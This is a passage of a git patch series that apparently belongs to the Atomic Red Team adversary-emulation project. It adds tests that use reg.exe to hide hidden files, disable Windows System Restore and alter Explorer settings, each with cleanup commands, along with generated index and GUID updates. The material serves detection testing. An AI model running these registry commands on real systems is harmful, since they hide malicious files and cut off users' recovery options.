+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+          reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1564.002:
     technique:
       external_references:
diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index 2770bf94..1d3175b6 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -24,6 +24,8 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
 
 - [Atomic Test #7 - Show all hidden files](#atomic-test-7---show-all-hidden-files)
 
+- [Atomic Test #8 - Hide Files Through Registry](#atomic-test-8---hide-files-through-registry)
+
 
 <br/>
 
@@ -283,4 +285,39 @@ defaults write com.apple.finder AppleShowAllFiles NO
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Hide Files Through Registry
+Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
+See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f650456b-bd49-4bc1-ae9d-271b5b9581e7
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From b8066ba1816e507372ce755bb7c177ec998886d4 Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Thu, 17 Mar 2022 17:24:40 +0100
Subject: [PATCH 66/83] Disable system restore through registry (#1818)

* Update T1112.yaml

* Update T1112.yaml

* typos

* Update T1490.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1490/T1490.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml
index f117a4da..c499ec54 100644
--- a/atomics/T1490/T1490.yaml
+++ b/atomics/T1490/T1490.yaml
@@ -115,3 +115,23 @@ atomic_tests:
       schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Disable System Restore Through Registry
+  auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
+    See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+    cleanup_command: |
+      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

From 6c5ba92a6b167f4b84f495c712ed1462daad941f Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Thu, 17 Mar 2022 16:25:24 +0000
Subject: [PATCH 67/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 834a6cd3..5583c396 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -930,3 +930,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 9dc7767b-30c1-4cc4-b999-50cab5e27891
 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
 f650456b-bd49-4bc1-ae9d-271b5b9581e7
+66e647d1-8741-4e43-b7c1-334760c2047f

From f6bb04b95fd3d955fdb8468f1934c9bfaa6d05e4 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 17 Mar 2022 16:25:32 +0000
Subject: [PATCH 68/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 20 +++++++++
 atomics/T1490/T1490.md                        | 41 +++++++++++++++++++
 6 files changed, 65 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 99d0d5ee..c1a95375 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -780,6 +780,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
 impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
+impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 37e47e0f..c9e747c8 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -533,6 +533,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
 impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
+impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3e7a10c4..6c942ee5 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1258,6 +1258,7 @@
   - Atomic Test #6: Windows - Delete Backup Files [windows]
   - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
   - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
+  - Atomic Test #9: Disable System Restore Through Registry [windows]
 - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 861cab4c..0c3b24f4 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -898,6 +898,7 @@
   - Atomic Test #6: Windows - Delete Backup Files [windows]
   - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
   - Atomic Test #8: Windows - Disable the SR scheduled task [windows]
+  - Atomic Test #9: Disable System Restore Through Registry [windows]
 - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 0f3f7d34..f2c596cc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -53804,6 +53804,26 @@ impact:
 '
         name: command_prompt
         elevation_required: true
+    - name: Disable System Restore Through Registry
+      auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to disable system restore on the computer. \nSee how remcos
+        RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+          reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+        cleanup_command: |
+          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1491.001:
     technique:
       external_references:
diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md
index 6004eceb..c9a35760 100644
--- a/atomics/T1490/T1490.md
+++ b/atomics/T1490/T1490.md
@@ -27,6 +27,8 @@ A number of native Windows utilities have been used by adversaries to disable or
 
 - [Atomic Test #8 - Windows - Disable the SR scheduled task](#atomic-test-8---windows---disable-the-sr-scheduled-task)
 
+- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)
+
 
 <br/>
 
@@ -285,4 +287,43 @@ schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Disable System Restore Through Registry
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
+See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 66e647d1-8741-4e43-b7c1-334760c2047f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From da6f4250f35bf68b043e4964081081c0b4524398 Mon Sep 17 00:00:00 2001
From: tccontre <26181693+tccontre@users.noreply.github.com>
Date: Thu, 17 Mar 2022 17:26:37 +0100
Subject: [PATCH 69/83] Modify show compress color and tips in registry (#1819)

* Update T1112.yaml

* Update T1112.yaml

* typos

* Update T1112.yaml

* Update T1112.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index aed17b49..48cdab44 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -480,3 +480,19 @@ atomic_tests:
       reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Windows Modify Show Compress Color And Info Tip Registry
+  auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
+    See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+      reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

From d2c0df108e3551c5342113a5102e704842378470 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Thu, 17 Mar 2022 16:27:11 +0000
Subject: [PATCH 70/83] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/used_guids.txt | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 5583c396..e2b027a3 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -931,3 +931,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e
 94ea9cc3-81f9-4111-8dde-3fb54f36af4b
 f650456b-bd49-4bc1-ae9d-271b5b9581e7
 66e647d1-8741-4e43-b7c1-334760c2047f
+795d3248-0394-4d4d-8e86-4e8df2a2693f

From 7845416d3d1680a03758fb670b5d9ac9c40c94dc Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Thu, 17 Mar 2022 16:27:17 +0000
Subject: [PATCH 71/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 16 ++++++++
 atomics/T1112/T1112.md                        | 37 +++++++++++++++++++
 6 files changed, 57 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index c1a95375..8344679a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -504,6 +504,7 @@ defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feat
 defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index c9e747c8..4fc63db9 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -334,6 +334,7 @@ defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feat
 defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
 defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 6c942ee5..2d17e41a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -779,6 +779,7 @@
   - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
   - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 0c3b24f4..0defaf92 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -546,6 +546,7 @@
   - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
   - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
+  - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index f2c596cc..5423cc2f 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -32224,6 +32224,22 @@ defense-evasion:
 '
         name: command_prompt
         elevation_required: true
+    - name: Windows Modify Show Compress Color And Info Tip Registry
+      auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f
+      description: "Modify the registry of the currently logged in user using reg.exe
+        via cmd console to show compress color and show tips feature. \nSee how hermeticwiper
+        uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html\n"
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+          reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+          reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+        name: command_prompt
+        elevation_required: true
   T1601:
     technique:
       external_references:
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index e4526dd0..1b235756 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -70,6 +70,8 @@ The Registry of a remote system may be modified to aid in execution of files as
 
 - [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature)
 
+- [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry)
+
 
 <br/>
 
@@ -1122,4 +1124,39 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry
+Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. 
+See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 795d3248-0394-4d4d-8e86-4e8df2a2693f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f
+reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
+reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+```
+
+
+
+
+
 <br/>

From c761e68ca050960da0e565038be5d7d326178901 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Fri, 18 Mar 2022 21:02:44 +0100
Subject: [PATCH 72/83] NoTrayContextMenu fix (#1820)

---
 atomics/T1112/T1112.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 48cdab44..18c5eb9b 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -385,7 +385,7 @@ atomic_tests:
   - windows
   executor:
     command: |
-      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
     cleanup_command: |
       reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /f >nul 2>&1
     name: command_prompt

From de5e865929fec8ae0137991639a4eebbab9fa89b Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 18 Mar 2022 20:03:18 +0000
Subject: [PATCH 73/83] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml | 2 +-
 atomics/T1112/T1112.md     | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 5423cc2f..a99d8565 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -32103,7 +32103,7 @@ defense-evasion:
       - windows
       executor:
         command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
-          /v StartMenuLogOff /t REG_DWORD /d 1 /f
+          /v NoTrayContextMenu /t REG_DWORD /d 1 /f
 
 '
         cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md
index 1b235756..7777c1a3 100644
--- a/atomics/T1112/T1112.md
+++ b/atomics/T1112/T1112.md
@@ -908,7 +908,7 @@ See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d
 
 
 ```cmd
-reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartMenuLogOff /t REG_DWORD /d 1 /f
+reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoTrayContextMenu /t REG_DWORD /d 1 /f
 ```
 
 #### Cleanup Commands:

From 0b336ae4985af226ed2624603a3b3852a2cc750d Mon Sep 17 00:00:00 2001
From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com>
Date: Sat, 19 Mar 2022 03:06:40 +0700
Subject: [PATCH 74/83] Update T1112.yaml (#1821)

Modified Windows Powershell registry to disable Logging module.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1112/T1112.yaml | 22 +++++++++++++++++++++-
 1 file changed, 21 insertions(+), 1 deletion(-)

diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml
index 18c5eb9b..25487998 100644
--- a/atomics/T1112/T1112.yaml
+++ b/atomics/T1112/T1112.yaml
@@ -493,6 +493,26 @@ atomic_tests:
       reg  add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f
     cleanup_command: |
       reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
-      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1
+      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
+    name: command_prompt
